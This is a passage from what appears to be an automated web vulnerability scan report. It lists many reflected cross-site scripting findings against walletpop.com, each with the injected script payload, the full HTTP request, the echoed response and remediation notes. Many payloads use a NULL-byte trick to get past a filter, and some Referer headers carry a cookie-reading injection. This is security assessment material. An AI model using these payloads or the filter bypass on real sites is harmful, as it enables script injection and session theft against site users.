Keep-Alive: timeout=5, max=999941
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35473
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%00f5064"><script>alert(1)</script>ee513e89ec6/02/03/1040-tax-forms-which-one-should-you-use/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c4caa"><script>alert(1)</script>4c7756513a2 was submitted in the REST URL parameter 1. This input was echoed as c4caa"><script>alert(1)</script>4c7756513a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%00c4caa"><script>alert(1)</script>4c7756513a2/02/03/government-issues-recall-of-another-lethal-crib/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:52:22 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999890
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%00c4caa"><script>alert(1)</script>4c7756513a2/02/03/government-issues-recall-of-another-lethal-crib/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb6a2"><script>alert(1)</script>5a56f96bc82 was submitted in the REST URL parameter 1. This input was echoed as eb6a2"><script>alert(1)</script>5a56f96bc82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /%00eb6a2"><script>alert(1)</script>5a56f96bc82/02/04/a-tax-credit-for-savers-do-you-qualify/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:52:24 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999877
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35459
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/%00eb6a2"><script>alert(1)</script>5a56f96bc82/02/04/a-tax-credit-for-savers-do-you-qualify/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0045940"><script>alert(1)</script>04f62045fc7 was submitted in the REST URL parameter 1. This input was echoed as 45940"><script>alert(1)</script>04f62045fc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%0045940"><script>alert(1)</script>04f62045fc7/02/04/help-my-tax-documents-are-late/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:52:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999932
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%0045940"><script>alert(1)</script>04f62045fc7/02/04/help-my-tax-documents-are-late/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005e480"><script>alert(1)</script>f90657b4a2 was submitted in the REST URL parameter 1. This input was echoed as 5e480"><script>alert(1)</script>f90657b4a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%005e480"><script>alert(1)</script>f90657b4a2/02/05/wine-deals-for-valentines-day/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:52:24 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%005e480"><script>alert(1)</script>f90657b4a2/02/05/wine-deals-for-valentines-day/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddfc9"><script>alert(1)</script>35f9d45da65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bankingddfc9"><script>alert(1)</script>35f9d45da65 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 967ac"><script>alert(1)</script>960457fed51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /banking967ac"><script>alert(1)</script>960457fed51/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487c5"><script>alert(1)</script>77f6bcb323f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog487c5"><script>alert(1)</script>77f6bcb323f/category/fantastic-freebies/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0057581"><script>alert(1)</script>e2c8e44a8 was submitted in the REST URL parameter 2. This input was echoed as 57581"><script>alert(1)</script>e2c8e44a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/category%0057581"><script>alert(1)</script>e2c8e44a8/fantastic-freebies/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999961
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/category%0057581"><script>alert(1)</script>e2c8e44a8/fantastic-freebies/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001721f"><script>alert(1)</script>c3d9b39b93b was submitted in the REST URL parameter 3. This input was echoed as 1721f"><script>alert(1)</script>c3d9b39b93b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/category/fantastic-freebies%001721f"><script>alert(1)</script>c3d9b39b93b/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:25 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999944
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/category/fantastic-freebies%001721f"><script>alert(1)</script>c3d9b39b93b/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313c9"><script>alert(1)</script>441d4476175 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog313c9"><script>alert(1)</script>441d4476175/media/awards_promo_bottom.gif HTTP/1.1
Host: www.walletpop.com
Proxy-Connection: keep-alive
Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066c7b"><script>alert(1)</script>e0aaca04e57 was submitted in the REST URL parameter 2. This input was echoed as 66c7b"><script>alert(1)</script>e0aaca04e57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media%0066c7b"><script>alert(1)</script>e0aaca04e57/awards_promo_bottom.gif HTTP/1.1
Host: www.walletpop.com
Proxy-Connection: keep-alive
Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 20:46:21 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Content-Length: 35665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media%0066c7b"><script>alert(1)</script>e0aaca04e57/awards_promo_bottom.gif/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00695e3"><script>alert(1)</script>a79700beed7 was submitted in the REST URL parameter 3. This input was echoed as 695e3"><script>alert(1)</script>a79700beed7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media/awards_promo_bottom.gif%00695e3"><script>alert(1)</script>a79700beed7 HTTP/1.1
Host: www.walletpop.com
Proxy-Connection: keep-alive
Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 20:46:22 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Content-Length: 35672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media/awards_promo_bottom.gif%00695e3"><script>alert(1)</script>a79700beed7/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5ca"><script>alert(1)</script>c7e139e7740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogcf5ca"><script>alert(1)</script>c7e139e7740/media/awards_promo_middle.gif HTTP/1.1
Host: www.walletpop.com
Proxy-Connection: keep-alive
Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c9a73"><script>alert(1)</script>8a89eb7e578 was submitted in the REST URL parameter 2. This input was echoed as c9a73"><script>alert(1)</script>8a89eb7e578 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media%00c9a73"><script>alert(1)</script>8a89eb7e578/awards_promo_middle.gif HTTP/1.1
Host: www.walletpop.com
Proxy-Connection: keep-alive
Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 20:46:21 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Content-Length: 35665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media%00c9a73"><script>alert(1)</script>8a89eb7e578/awards_promo_middle.gif/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009fa50"><script>alert(1)</script>1307eefa2d3 was submitted in the REST URL parameter 3. This input was echoed as 9fa50"><script>alert(1)</script>1307eefa2d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media/awards_promo_middle.gif%009fa50"><script>alert(1)</script>1307eefa2d3 HTTP/1.1
Host: www.walletpop.com
Proxy-Connection: keep-alive
Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 20:46:22 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Content-Length: 35671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media/awards_promo_middle.gif%009fa50"><script>alert(1)</script>1307eefa2d3/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415c4"><script>alert(1)</script>2692b0d008f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /calculators415c4"><script>alert(1)</script>2692b0d008f HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5cf"><script>alert(1)</script>e9af38db5bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoryce5cf"><script>alert(1)</script>e9af38db5bd/debt/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a7ef"><script>alert(1)</script>8072aa8b091 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/debt8a7ef"><script>alert(1)</script>8072aa8b091/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f27a9"><script>alert(1)</script>5cf2701642a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoryf27a9"><script>alert(1)</script>5cf2701642a/fraud/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d532"><script>alert(1)</script>8ef82b2be4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fraud9d532"><script>alert(1)</script>8ef82b2be4c/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d9df"><script>alert(1)</script>fedd8cd7bf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category7d9df"><script>alert(1)</script>fedd8cd7bf4/insurance/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3409d"><script>alert(1)</script>724d3168b2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/insurance3409d"><script>alert(1)</script>724d3168b2e/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8becd"><script>alert(1)</script>487c03d15bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category8becd"><script>alert(1)</script>487c03d15bc/loans/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eaa0"><script>alert(1)</script>9c89b35ab7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/loans4eaa0"><script>alert(1)</script>9c89b35ab7e/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68873"><script>alert(1)</script>1b433b384e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category68873"><script>alert(1)</script>1b433b384e4/recalls/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dc3"><script>alert(1)</script>2fe642e4103 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/recalls47dc3"><script>alert(1)</script>2fe642e4103/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbe8a"><script>alert(1)</script>d16c755a7b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categorycbe8a"><script>alert(1)</script>d16c755a7b3/retire/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16521"><script>alert(1)</script>e4074b1b136 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/retire16521"><script>alert(1)</script>e4074b1b136/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84a38"><script>alert(1)</script>d66e5b9f1c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /college-finance84a38"><script>alert(1)</script>d66e5b9f1c3 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 333ea"><script>alert(1)</script>527eaddf0e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /college-finance333ea"><script>alert(1)</script>527eaddf0e4/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872aa"><script>alert(1)</script>30128d4c378 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
